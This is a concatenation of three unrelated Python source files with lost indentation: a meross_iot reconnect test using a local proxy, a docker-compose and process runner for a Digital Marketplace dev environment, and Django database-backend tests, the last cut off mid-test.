from meross_iot.cloud.exceptions.CommandTimeoutException import CommandTimeoutException
from meross_iot.manager import MerossManager
EMAIL = os.environ.get('MEROSS_EMAIL')
PASSWORD = os.environ.get('MEROSS_PASSWORD')
PROXY_PORT = 6001
def is_python6_or_more():
ver = sys.version_info
return ver.major >= 3 and ver.minor >= 6
if is_python6_or_more():
import proxy
else:
proxy=None
class TestAutoreconnect(unittest.TestCase):
def setUp(self):
self.manager = MerossManager.from_email_and_password(meross_email=EMAIL, meross_password=PASSWORD, auto_reconnect=True)
class WorkerThread(object):
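# Background worker that toggles the plug on/off roughly once per second until
# stopped, keeping MQTT traffic flowing while the connection is dropped and
# re-established.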
def __init__(self, device: GenericPlug):
self.device = device
self._t = Thread(target=self._run)
self.stopped = Event()
def start(self):
self._t.start()
def stop(self):
self.stopped.set()
self._t.join()
def _run(self):
while True:
try:
status = self.device.get_channel_status(0)
if status:
self.device.turn_off()
else:
self.device.turn_on()
except CommandTimeoutException:
print("Command timed out.")
pass
finally:
if self.stopped.wait(1):
break
def test_single_threaded_connection_drop(self):
if not is_python6_or_more():
self.skipTest("Cannot use proxy on python < 3.6")
# Allocate the proxy
dev = None
print("Connecting through proxy...")
with proxy.start(['--num-workers', '1', '--hostname', '127.0.0.1', '--port', str(PROXY_PORT)]):
# Configure the manager client to use the proxy
self.manager._cloud_client._mqtt_client.proxy_set(proxy_type=socks.HTTP, proxy_addr="127.0.0.1",
proxy_port=PROXY_PORT)
# Connect
self.manager.start()
self.assertTrue(self.manager._cloud_client.connection_status.check_status(ClientStatus.SUBSCRIBED))
# Wait a bit before closing the proxy. In the meanwhile, select a device to be used for testing.
devices = self.manager.get_supported_devices()
if len(devices) < 1:
self.skipTest("Could not find any device to test...")
dev = devices[0]
status = dev.get_status(force_status_refresh=True)
print("Device status: %s" % str(status))
time.sleep(5)
print("Closing the proxy to trigger disconnection")
print("Proxy closed")
try:
            dev.get_status(force_status_refresh=True)
            self.fail("Device was still reachable after the proxy was closed.")
except CommandTimeoutException:
print("Device is unreachable. That's ok!")
print("Reconnecting the proxy...")
with proxy.start(['--num-workers', '1', '--hostname', '127.0.0.1', '--port', str(PROXY_PORT)]):
self.manager._cloud_client.connection_status.wait_for_status(ClientStatus.SUBSCRIBED, timeout=30)
new_status = dev.get_status(force_status_refresh=True)
print("New device status: %s" % new_status)
self.manager.stop(logout=True)
def test_multithreaded_connection_drop(self):
if not is_python6_or_more():
self.skipTest("Cannot use proxy on python < 3.6")
# Allocate the proxy
workers = []
print("Connecting through proxy...")
with proxy.start(['--num-workers', '1', '--hostname', '127.0.0.1', '--port', str(PROXY_PORT)]):
# Configure the manager client to use the proxy
self.manager._cloud_client._mqtt_client.proxy_set(proxy_type=socks.HTTP, proxy_addr="127.0.0.1",
proxy_port=PROXY_PORT)
# Connect
self.manager.start()
# Start 2 workers for every plug
for p in self.manager.get_devices_by_kind(GenericPlug):
w1 = TestAutoreconnect.WorkerThread(p)
w2 = TestAutoreconnect.WorkerThread(p)
workers.append(w1)
workers.append(w2)
w1.start()
w2.start()
print("Started workers. Waiting a bit....")
time.sleep(10)
print("Dropping connection...")
self.manager._cloud_client.connection_status.wait_for_status(ClientStatus.CONNECTION_DROPPED, timeout=30)
print("Proxy has been closed. Waiting 120 seconds to trigger timeouts")
time.sleep(120)
print("Establishing connection back again...")
with proxy.start(['--num-workers', '1', '--hostname', '127.0.0.1', '--port', str(PROXY_PORT)]):
print("Proxy online again. Waiting a bit...")
time.sleep(10)
print("Stopping workers")
for w in workers:
w.stop()
print("Closing manager.")
self.manager.stop(logout=True)
def tearDown(self):
pass
|
process.py
|
# -*- coding: utf-8 -*-
import ansicolor
from contextlib import contextmanager
import getpass
import os
import psycopg2
import re
import requests
import pexpect
import signal
import socket
import subprocess
import sys
import threading
import time
from typing import Optional
from .utils import PROCESS_TERMINATED, PROCESS_NOEXIST, EXITCODE_NOT_ANTICIPATED_EXECUTION, bold
class DMExecutable:
def _get_clean_env(self):
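        # Copy the current environment, dropping VIRTUAL_ENV so children resolve their own virtualenvs, forcing unbuffered Python output and recording the invoking user.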
env = os.environ.copy()
if "VIRTUAL_ENV" in env:
del env["VIRTUAL_ENV"]
env["PYTHONUNBUFFERED"] = "1"
env["DMRUNNER_USER"] = getpass.getuser()
return env
def _log(self, log_entry, log_name, attach=None):
self._logger(log_entry.strip("\r\n").strip("\n"), log_name, attach)
class DMServices(DMExecutable):
def __init__(self, logger, docker_compose_filepath, docker_arg="up", log_name="services"):
self._logger = logger
self._docker_compose_filepath = docker_compose_filepath
self._docker_arg = docker_arg
self._log_name = log_name
self._service_process = None
self._thread_process = None
self._thread_healthcheck: Optional[threading.Thread] = None
self._process_alive = threading.Event()
self._logs_finished = threading.Event()
self.run()
@staticmethod
def _get_docker_compose_command(docker_compose_filepath, docker_arg):
return ["docker-compose", "-f", docker_compose_filepath, docker_arg]
@classmethod
def build_services(cls, docker_compose_filepath):
return subprocess.call(cls._get_docker_compose_command(docker_compose_filepath, "build"))
@staticmethod
def services_healthcheck(shutdown_event, check_once=False):
"""Attempts to validate that required background services (NGINX, Elasticsearch, Postgres) are all
operational. It takes some shortcuts in doing so, but should be effective in most cases."""
healthcheck_result = {"nginx": False, "elasticsearch": False, "postgres": False}
try:
while not all(healthcheck_result.values()) and (not shutdown_event.is_set() or check_once):
# Try to connect to port 80 - assume that a successful connection means nginx is listening on port 80.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect(("localhost", 80))
healthcheck_result["nginx"] = True
except ConnectionError:
healthcheck_result["nginx"] = False
finally:
s.close()
try:
# Check ES cluster health - assume that a 200 response means ES is fine.
cluster_endpoint = requests.get("http://localhost:9200/_cluster/health")
healthcheck_result["elasticsearch"] = cluster_endpoint.status_code == 200
except (requests.exceptions.ConnectionError, AttributeError) as e:
healthcheck_result["elasticsearch"] = False
# Connect to Postgres with default parameters - assume a successful connection means postgres is up.
try:
psycopg2.connect(dbname="digitalmarketplace", user=getpass.getuser(), host="localhost").close()
healthcheck_result["postgres"] = True
except psycopg2.OperationalError:
healthcheck_result["postgres"] = False
if all(healthcheck_result.values()):
break
if check_once:
break
time.sleep(1)
except KeyboardInterrupt as e:
print(sys.exc_info())
sys.exit(EXITCODE_NOT_ANTICIPATED_EXECUTION)
return all(healthcheck_result.values()), healthcheck_result
def _run_in_thread(self):
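        # Launch docker-compose in its own session and stream its combined output, logging each "service | message" line under the originating service's name.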
self._service_process = subprocess.Popen(
self._get_docker_compose_command(self._docker_compose_filepath, self._docker_arg),
env=self._get_clean_env(),
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True,
bufsize=1,
start_new_session=True,
)
self._process_alive.set()
try:
while True:
log_entry = self._service_process.stdout.readline()
clean_log_entry = ansicolor.strip_escapes(log_entry)
try:
if clean_log_entry.index("|") >= 0:
service_name = clean_log_entry[: clean_log_entry.index("|")].strip()
log_entry = re.sub(r"^[^|]+\s+\|\s+", "", clean_log_entry)
else:
service_name = self._log_name
except ValueError:
service_name = self._log_name
self._log(log_entry, log_name=service_name)
if self._service_process.poll() is not None:
log_entries = self._service_process.stdout.read().split("\n")
for log_entry in log_entries:
self._log(log_entry, log_name=service_name)
break
except (pexpect.exceptions.EOF, IOError):
pass
except Exception as e: # E.g. SIGINT from Ctrl+C on main thread; bail out
self._log("{}: {}".format(type(e), str(e)), log_name=self._log_name)
self._logs_finished.set()
def blocking_healthcheck(self, shutdown_event):
self._thread_healthcheck = threading.Thread(
target=self.services_healthcheck, args=(shutdown_event,), name="Thread-Services-HC"
)
self._thread_healthcheck.start()
self._log("Running services healthcheck ...", log_name=self._log_name)
try:
self._thread_healthcheck.join()
except KeyboardInterrupt:
            # We will send an interrupt, but if it is received before docker-compose has reached a certain point,
            # the containers /may not/ be shut down.
self._service_process.send_signal(signal.SIGINT)
raise
else:
self._log(log_entry="Services are up.", log_name=self._log_name)
def run(self):
self._thread_process = threading.Thread(target=self._run_in_thread, name="Thread-Services")
self._thread_process.start()
def wait(self, interrupt=False):
self._process_alive.wait()
if interrupt:
self._service_process.send_signal(signal.SIGINT)
returncode = self._service_process.wait()
self._logs_finished.wait()
return returncode
@contextmanager
def background_services(logger, docker_compose_filepath, clean=False):
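    # Optionally tear down existing containers, bring the docker-compose services up, block until the healthcheck passes, yield to the caller, then interrupt and wait for the services on exit.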
if clean is True:
logger(bold("Destroying existing containers ..."))
services = DMServices(logger=logger, docker_compose_filepath=docker_compose_filepath, docker_arg="down")
services.wait()
shutdown_event = threading.Event()
docker_services = DMServices(logger=logger, docker_compose_filepath=docker_compose_filepath)
try:
docker_services.blocking_healthcheck(shutdown_event)
except KeyboardInterrupt as e:
shutdown_event.set()
raise e
yield
docker_services.wait(interrupt=True)
@contextmanager
def blank_context():
yield
class DMProcess(DMExecutable):
def __init__(self, app, logger, app_command):
self._thread = None
self._app = app
self._logger = logger
self._app_command = app_command
self._app_instance = None
self.run(app_command=self._app_command)
def _get_clean_env(self):
clean_env = {
"PYTHONUNBUFFERED": "1",
"DMRUNNER_USER": getpass.getuser(),
"PATH": os.environ["PATH"],
"LANG": os.environ["LANG"],
}
dm_env = {key: value for key, value in os.environ.items() if key.startswith("DM_")}
return {**clean_env, **dm_env}
def _get_command(self, app_command):
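        # Resolve a named entry from the app's "commands" mapping, falling back to treating app_command as a literal command string.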
return self._app["commands"][app_command] if app_command in self._app["commands"] else app_command
def _run_in_thread(self, app_command):
self._app_instance = pexpect.spawn(
self._get_command(app_command), cwd=self._app["repo_path"], env=self._get_clean_env(), timeout=1
)
self._app["process"] = self._app_instance.pid
try:
while not self._app_instance.eof():
try:
# pexpect's pseudo-tty adds Windows-style line endings even on unix systems, so need to remove \r\n.
log_entry = self._app_instance.readline().decode("utf-8").strip("\r\n")
self._log(log_entry, log_name=self._app["name"])
except pexpect.exceptions.TIMEOUT:
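                    # On a read timeout, probe (with a zero timeout) for a "(Pdb)" prompt so the runner can flush buffered output and attach to the debugger session.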
if not self._app.get("attached"):
try:
self._app_instance.expect("(Pdb)", timeout=0)
log_entries = self._app_instance.before.decode("utf-8").split("\r\n")
for log_entry in log_entries:
self._log(log_entry, log_name=self._app["name"])
self._app["attached"] = True
self._log(
"Attaching to {} ...".format(self._app["name"]),
log_name=self._app["name"],
attach=True,
)
except pexpect.exceptions.TIMEOUT:
continue
except BaseException as e: # E.g. SIGINT from Ctrl+C on main thread; bail out
self._log(repr(e), log_name=self._app["name"])
if self._app["name"].endswith("-fe-build"):
self._log("Build complete for {} ".format(self._app["name"]), log_name=self._app["name"])
self._app["process"] = PROCESS_TERMINATED
def run(self, app_command):
self._app["process"] = PROCESS_NOEXIST
self._thread = threading.Thread(
target=self._run_in_thread, args=(app_command,), name="Thread-{}".format(self._app["name"])
)
self._thread.start()
def process_input(self, user_input):
self._app_instance.sendline(user_input)
if user_input.lower().strip() in ["q", "quit", "c", "con", "cont", "continue"]:
self._app["attached"] = False
self._log("Detaching from {} ...".format(self._app["name"]), log_name="manager", attach=True)
def wait(self):
try:
self._thread.join()
except KeyboardInterrupt:
self._app_instance.kill(signal.SIGINT)
self._app_instance.close()
raise
self._app_instance.close()
return self._app_instance.exitstatus
|
tests.py
|
# -*- coding: utf-8 -*-
# Unit and doctests for specific database backends.
from __future__ import unicode_literals
import datetime
import re
import threading
import unittest
import warnings
from decimal import Decimal, Rounded
from django.core.exceptions import ImproperlyConfigured
from django.core.management.color import no_style
from django.db import (
DEFAULT_DB_ALIAS, DatabaseError, IntegrityError, connection, connections,
reset_queries, transaction,
)
from django.db.backends.base.base import BaseDatabaseWrapper
from django.db.backends.postgresql import version as pg_version
from django.db.backends.signals import connection_created
from django.db.backends.utils import CursorWrapper, format_number
from django.db.models import Avg, StdDev, Sum, Variance
from django.db.models.sql.constants import CURSOR
from django.db.utils import ConnectionHandler
from django.test import (
SimpleTestCase, TestCase, TransactionTestCase, mock, override_settings,
skipIfDBFeature, skipUnlessDBFeature,
)
from django.test.utils import str_prefix
from django.utils import six
from django.utils.six.moves import range
from . import models
class DummyBackendTest(SimpleTestCase):
def test_no_databases(self):
"""
        Test that an empty DATABASES setting defaults to the dummy backend.
"""
DATABASES = {}
conns = ConnectionHandler(DATABASES)
self.assertEqual(conns[DEFAULT_DB_ALIAS].settings_dict['ENGINE'],
'django.db.backends.dummy')
with self.assertRaises(ImproperlyConfigured):
conns[DEFAULT_DB_ALIAS].ensure_connection()
@unittest.skipUnless(connection.vendor == 'oracle', "Test only for Oracle")
class OracleTests(unittest.TestCase):
def test_quote_name(self):
# Check that '%' chars are escaped for query execution.
name = '"SOME%NAME"'
quoted_name = connection.ops.quote_name(name)
self.assertEqual(quoted_name % (), name)
def test_dbms_session(self):
# If the backend is Oracle, test that we can call a standard
# stored procedure through our cursor wrapper.
from django.db.backends.oracle.base import convert_unicode
with connection.cursor() as cursor:
cursor.callproc(convert_unicode('DBMS_SESSION.SET_IDENTIFIER'),
[convert_unicode('_django_testing!')])
def test_cursor_var(self):
# If the backend is Oracle, test that we can pass cursor variables
# as query parameters.
from django.db.backends.oracle.base import Database
with connection.cursor() as cursor:
var = cursor.var(Database.STRING)
cursor.execute("BEGIN %s := 'X'; END; ", [var])
self.assertEqual(var.getvalue(), 'X')
def test_long_string(self):
# If the backend is Oracle, test that we can save a text longer
# than 4000 chars and read it properly
with connection.cursor() as cursor:
cursor.execute('CREATE TABLE ltext ("TEXT" NCLOB)')
long_str = ''.join(six.text_type(x) for x in range(4000))
cursor.execute('INSERT INTO ltext VALUES (%s)', [long_str])
cursor.execute('SELECT text FROM ltext')
row = cursor.fetchone()
self.assertEqual(long_str, row[0].read())
cursor.execute('DROP TABLE ltext')
def test_client_encoding(self):
# If the backend is Oracle, test that the client encoding is set
# correctly. This was broken under Cygwin prior to r14781.
connection.ensure_connection()
self.assertEqual(connection.connection.encoding, "UTF-8")
self.assertEqual(connection.connection.nencoding, "UTF-8")
def test_order_of_nls_parameters(self):
# an 'almost right' datetime should work with configured
# NLS parameters as per #18465.
with connection.cursor() as cursor:
query = "select 1 from dual where '1936-12-29 00:00' < sysdate"
# Test that the query succeeds without errors - pre #18465 this
# wasn't the case.
cursor.execute(query)
self.assertEqual(cursor.fetchone()[0], 1)
@unittest.skipUnless(connection.vendor == 'sqlite', "Test only for SQLite")
class SQLiteTests(TestCase):
longMessage = True
def test_autoincrement(self):
"""
Check that auto_increment fields are created with the AUTOINCREMENT
keyword in order to be monotonically increasing. Refs #10164.
"""
with connection.schema_editor(collect_sql=True) as editor:
editor.create_model(models.Square)
statements = editor.collected_sql
match = re.search('"id" ([^,]+),', statements[0])
self.assertIsNotNone(match)
self.assertEqual('integer NOT NULL PRIMARY KEY AUTOINCREMENT',
match.group(1), "Wrong SQL used to create an auto-increment "
"column on SQLite")
def test_aggregation(self):
"""
#19360: Raise NotImplementedError when aggregating on date/time fields.
"""
for aggregate in (Sum, Avg, Variance, StdDev):
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate, aggregate('time'))
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate, aggregate('date'))
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate, aggregate('last_modified'))
self.assertRaises(
NotImplementedError,
models.Item.objects.all().aggregate,
**{'complex': aggregate('last_modified') + aggregate('last_modified')})
@unittest.skipUnless(connection.vendor == 'postgresql', "Test only for PostgreSQL")
class PostgreSQLTests(TestCase):
def assert_parses(self, version_string, version):
self.assertEqual(pg_version._parse_version(version_string), version)
def test_parsing(self):
"""Test PostgreSQL version parsing from `SELECT version()` output"""
self.assert_parses("PostgreSQL 9.3 beta4", 90300)
self.assert_parses("PostgreSQL 9.3", 90300)
self.assert_parses("EnterpriseDB 9.3", 90300)
self.assert_parses("PostgreSQL 9.3.6", 90306)
self.assert_parses("PostgreSQL 9.4beta1", 90400)
self.assert_parses(
"PostgreSQL 9.3.1 on i386-apple-darwin9.2.2, compiled by GCC "
"i686-apple-darwin9-gcc-4.0.1 (GCC) 4.0.1 (Apple Inc. build 5478)",
90301
)
def test_nodb_connection(self):
"""
        Test that the _nodb_connection property falls back to the default connection
database when access to the 'postgres' database is not granted.
"""
def mocked_connect(self):
if self.settings_dict['NAME'] is None:
raise DatabaseError()
return ''
nodb_conn = connection._nodb_connection
self.assertIsNone(nodb_conn.settings_dict['NAME'])
# Now assume the 'postgres' db isn't available
with warnings.catch_warnings(record=True) as w:
with mock.patch('django.db.backends.base.base.BaseDatabaseWrapper.connect',
side_effect=mocked_connect, autospec=True):
nodb_conn = connection._nodb_connection
self.assertIsNotNone(nodb_conn.settings_dict['NAME'])
self.assertEqual(nodb_conn.settings_dict['NAME'], connection.settings_dict['NAME'])
# Check a RuntimeWarning has been emitted
self.assertEqual(len(w), 1)
self.assertEqual(w[0].message.__class__, RuntimeWarning)
def test_version_detection(self):
"""Test PostgreSQL version detection"""
# Helper mocks
class CursorMock(object):
"Very simple mock of DB-API cursor"
def execute(self, arg):
pass
def fetchone(self):
return ["PostgreSQL 9.3"]
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
class OlderConnectionMock(object):
"Mock of psycopg2 (< 2.0.12) connection"
def cursor(self):
return CursorMock()
# psycopg2 < 2.0.12 code path
conn = OlderConnectionMock()
self.assertEqual(pg_version.get_version(conn), 90300)
def test_connect_and_rollback(self):
"""
PostgreSQL shouldn't roll back SET TIME ZONE, even if the first
transaction is rolled back (#17062).
"""
new_connection = connection.copy()
try:
# Ensure the database default time zone is different than
# the time zone in new_connection.settings_dict. We can
# get the default time zone by reset & show.
cursor = new_connection.cursor()
cursor.execute("RESET TIMEZONE")
cursor.execute("SHOW TIMEZONE")
db_default_tz = cursor.fetchone()[0]
new_tz = 'Europe/Paris' if db_default_tz == 'UTC' else 'UTC'
new_connection.close()
# Invalidate timezone name cache, because the setting_changed
# handler cannot know about new_connection.
del new_connection.timezone_name
# Fetch a new connection with the new_tz as default
# time zone, run a query and rollback.
with self.settings(TIME_ZONE=new_tz):
new_connection.set_autocommit(False)
cursor = new_connection.cursor()
new_connection.rollback()
# Now let's see if the rollback rolled back the SET TIME ZONE.
cursor.execute("SHOW TIMEZONE")
tz = cursor.fetchone()[0]
self.assertEqual(new_tz, tz)
finally:
new_connection.close()
def test_connect_non_autocommit(self):
"""
The connection wrapper shouldn't believe that autocommit is enabled
after setting the time zone when AUTOCOMMIT is False (#21452).
"""
new_connection = connection.copy()
new_connection.settings_dict['AUTOCOMMIT'] = False
try:
# Open a database connection.
new_connection.cursor()
self.assertFalse(new_connection.get_autocommit())
finally:
new_connection.close()
def test_connect_isolation_level(self):
"""
Regression test for #18130 and #24318.
"""
from psycopg2.extensions import (
ISOLATION_LEVEL_READ_COMMITTED as read_committed,
ISOLATION_LEVEL_SERIALIZABLE as serializable,
)
# Since this is a django.test.TestCase, a transaction is in progress
# and the isolation level isn't reported as 0. This test assumes that
# PostgreSQL is configured with the default isolation level.
# Check the level on the psycopg2 connection, not the Django wrapper.
self.assertEqual(connection.connection.isolation_level, read_committed)
new_connection = connection.copy()
new_connection.settings_dict['OPTIONS']['isolation_level'] = serializable
try:
# Start a transaction so the isolation level isn't reported as 0.
new_connection.set_autocommit(False)
# Check the level on the psycopg2 connection, not the Django wrapper.
self.assertEqual(new_connection.connection.isolation_level, serializable)
finally:
new_connection.close()
def _select(self, val):
with connection.cursor() as cursor:
cursor.execute("SELECT %s", (val,))
return cursor.fetchone()[0]
def test_select_ascii_array(self):
a = ["awef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_select_unicode_array(self):
a = ["ᄲawef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_lookup_cast(self):
from django.db.backends.postgresql.operations import DatabaseOperations
do = DatabaseOperations(connection=None)
for lookup in ('iexact', 'contains', 'icontains', 'startswith',
'istartswith', 'endswith', 'iendswith', 'regex', 'iregex'):
self.assertIn('::text', do.lookup_cast(lookup))
def test_correct_extraction_psycopg2_version(self):
from django.db.backends.postgresql.base import psycopg2_version
version_path = 'django.db.backends.postgresql.base.Database.__version__'
with mock.patch(version_path, '2.6.9'):
self.assertEqual(psycopg2_version(), (2, 6, 9))
with mock.patch(version_path, '2.5.dev0'):
self.assertEqual(psycopg2_version(), (2, 5))
class DateQuotingTest(TestCase):
def test_django_date_trunc(self):
"""
        Test the custom ``django_date_trunc`` method, in particular against
fields which clash with strings passed to it (e.g. 'year') - see
#12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
years = models.SchoolClass.objects.dates('last_updated', 'year')
self.assertEqual(list(years), [datetime.date(2010, 1, 1)])
def test_django_date_extract(self):
"""
        Test the custom ``django_date_extract`` method, in particular against fields
which clash with strings passed to it (e.g. 'day') - see #12818__.
__: http://code.djangoproject.com/ticket/12818
"""
updated = datetime.datetime(2010, 2, 20)
models.SchoolClass.objects.create(year=2009, last_updated=updated)
classes = models.SchoolClass.objects.filter(last_updated__day=20)
self.assertEqual(len(classes), 1)
@override_settings(DEBUG=True)
class LastExecutedQueryTest(TestCase):
def test_last_executed_query(self):
"""
last_executed_query should not raise an exception even if no previous
query has been run.
"""
cursor = connection.cursor()
connection.ops.last_executed_query(cursor, '', ())
def test_debug_sql(self):
list(models.Reporter.objects.filter(first_name="test"))
sql = connection.queries[-1]['sql'].lower()
self.assertIn("select", sql)
self.assertIn(models.Reporter._meta.db_table, sql)
def test_query_encoding(self):
"""
        Test that last_executed_query() returns a Unicode string
"""
data = models.RawData.objects.filter(raw_data=b'\x00\x46 \xFE').extra(select={'föö': 1})
sql, params = data.query.sql_with_params()
cursor = data.query.get_compiler('default').execute_sql(CURSOR)
last_sql = cursor.db.ops.last_executed_query(cursor, sql, params)
self.assertIsInstance(last_sql, six.text_type)
@unittest.skipUnless(connection.vendor == 'sqlite',
"This test is specific to SQLite.")
def test_no_interpolation_on_sqlite(self):
# Regression for #17158
# This shouldn't raise an exception
query = "SELECT strftime('%Y', 'now');"
connection.cursor().execute(query)
self.assertEqual(connection.queries[-1]['sql'],
str_prefix("QUERY = %(_)s\"SELECT strftime('%%Y', 'now');\" - PARAMS = ()"))
class ParameterHandlingTest(TestCase):
def test_bad_parameter_count(self):
"An executemany call with too many/not enough parameters will raise an exception (Refs #12612)"
cursor = connection.cursor()
query = ('INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (
connection.introspection.table_name_converter('backends_square'),
connection.ops.quote_name('root'),
connection.ops.quote_name('square')
))
self.assertRaises(Exception, cursor.executemany, query, [(1, 2, 3)])
self.assertRaises(Exception, cursor.executemany, query, [(1,)])
# Unfortunately, the following tests would be good to run on all backends, but
# they break MySQL hard. Until #13711 is fixed, they can't be run everywhere
# (although they would be an effective test of #13711).
class LongNameTest(TransactionTestCase):
"""Long primary keys and model names can result in a sequence name
that exceeds the database limits, which will result in truncation
on certain databases (e.g., Postgres). The backend needs to use
    the correct sequence name in last_insert_id and other places, so
    check that it does. Refs #8901.
"""
available_apps = ['backends']
def test_sequence_name_length_limits_create(self):
"""Test creation of model with long name and long pk name doesn't error. Ref #8901"""
models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
def test_sequence_name_length_limits_m2m(self):
"""
An m2m save of a model with a long name and a long m2m field name
doesn't error (#8901).
"""
obj = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
rel_obj = models.Person.objects.create(first_name='Django', last_name='Reinhardt')
obj.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.add(rel_obj)
def test_sequence_name_length_limits_flush(self):
"""
Sequence resetting as part of a flush with model with long name and
long pk name doesn't error (#8901).
"""
        # A full flush is expensive for the full test run, so we dig into the
        # internals to generate the likely offending SQL and run it manually.
# Some convenience aliases
VLM = models.VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
VLM_m2m = VLM.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.through
tables = [
VLM._meta.db_table,
VLM_m2m._meta.db_table,
]
sequences = [
{
'column': VLM._meta.pk.column,
'table': VLM._meta.db_table
},
]
cursor = connection.cursor()
for statement in connection.ops.sql_flush(no_style(), tables, sequences):
cursor.execute(statement)
class SequenceResetTest(TestCase):
def test_generic_relation(self):
"Sequence names are correct when resetting generic relations (Ref #13941)"
# Create an object with a manually specified PK
models.Post.objects.create(id=10, name='1st post', text='hello world')
# Reset the sequences for the database
cursor = connection.cursor()
commands = connections[DEFAULT_DB_ALIAS].ops.sequence_reset_sql(no_style(), [models.Post])
for sql in commands:
cursor.execute(sql)
# If we create a new object now, it should have a PK greater
# than the PK we specified manually.
obj = models.Post.objects.create(name='New post', text='goodbye world')
self.assertGreater(obj.pk, 10)
# This test needs to run outside of a transaction, otherwise closing the
# connection would implicitly rollback and cause problems during teardown.
class ConnectionCreatedSignalTest(TransactionTestCase):
available_apps = []
# Unfortunately with sqlite3 the in-memory test database cannot be closed,
# and so it cannot be re-opened during testing.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_signal(self):
data = {}
def receiver(sender, connection, **kwargs):
data["connection"] = connection
connection_created.connect(receiver)
connection.close()
connection.cursor()
self.assertIs(data["connection"].connection, connection.connection)
connection_created.disconnect(receiver)
data.clear()
connection.cursor()
self.assertEqual(data, {})
class EscapingChecks(TestCase):
"""
All tests in this test case are also run with settings.DEBUG=True in
EscapingChecksDebug test case, to also test CursorDebugWrapper.
"""
bare_select_suffix = connection.features.bare_select_suffix
def test_paramless_no_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%s'" + self.bare_select_suffix)
self.assertEqual(cursor.fetchall()[0][0], '%s')
def test_parameter_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%%', %s" + self.bare_select_suffix, ('%d',))
self.assertEqual(cursor.fetchall()[0], ('%', '%d'))
@unittest.skipUnless(connection.vendor == 'sqlite',
"This is an sqlite-specific issue")
def test_sqlite_parameter_escaping(self):
# '%s' escaping support for sqlite3 #13648
cursor = connection.cursor()
cursor.execute("select strftime('%s', date('now'))")
response = cursor.fetchall()[0][0]
        # response should be a non-zero integer
self.assertTrue(int(response))
@override_settings(DEBUG=True)
class EscapingChecksDebug(EscapingChecks):
pass
class BackendTestCase(TransactionTestCase):
available_apps = ['backends']
def create_squares_with_executemany(self, args):
self.create_squares(args, 'format', True)
def create_squares(self, args, paramstyle, multiple):
cursor = connection.cursor()
opts = models.Square._meta
tbl = connection.introspection.table_name_converter(opts.db_table)
f1 = connection.ops.quote_name(opts.get_field('root').column)
f2 = connection.ops.quote_name(opts.get_field('square').column)
if paramstyle == 'format':
query = 'INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (tbl, f1, f2)
elif paramstyle == 'pyformat':
query = 'INSERT INTO %s (%s, %s) VALUES (%%(root)s, %%(square)s)' % (tbl, f1, f2)
else:
raise ValueError("unsupported paramstyle in test")
if multiple:
cursor.executemany(query, args)
else:
cursor.execute(query, args)
def test_cursor_executemany(self):
# Test cursor.executemany #4896
args = [(i, i ** 2) for i in range(-5, 6)]
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
def test_cursor_executemany_with_empty_params_list(self):
# Test executemany with params=[] does nothing #4765
args = []
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 0)
def test_cursor_executemany_with_iterator(self):
# Test executemany accepts iterators #10320
args = iter((i, i ** 2) for i in range(-3, 2))
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 5)
args = iter((i, i ** 2) for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 9)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_execute_with_pyformat(self):
# Support pyformat style passing of parameters #10070
args = {'root': 3, 'square': 9}
self.create_squares(args, 'pyformat', multiple=False)
self.assertEqual(models.Square.objects.count(), 1)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat(self):
# Support pyformat style passing of parameters #10070
args = [{'root': i, 'square': i ** 2} for i in range(-5, 6)]
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat_iterator(self):
args = iter({'root': i, 'square': i ** 2} for i in range(-3, 2))
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 5)
args = iter({'root': i, 'square': i ** 2} for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 9)
def test_unicode_fetches(self):
# fetchone, fetchmany, fetchall return strings as unicode objects #6254
qn = connection.ops.quote_name
models.Person(first_name="John", last_name="Doe").save()
models.Person(first_name="Jane", last_name="Doe").save()
models.Person(first_name="Mary", last_name="Agnelline").save()
models.Person(first_name="Peter", last_name="Parker").save()
models.Person(first_name="Clark", last_name="Kent").save()
opts2 = models.Person._meta
f3, f4 = opts2.get_field('first_name'), opts2.get_field('last_name')
query2 = ('SELECT %s, %s FROM %s ORDER BY %s'
% (qn(f3.column), qn(f4.column), connection.introspection.table_name_converter(opts2.db_table),
qn(f3.column)))
cursor = connection.cursor()
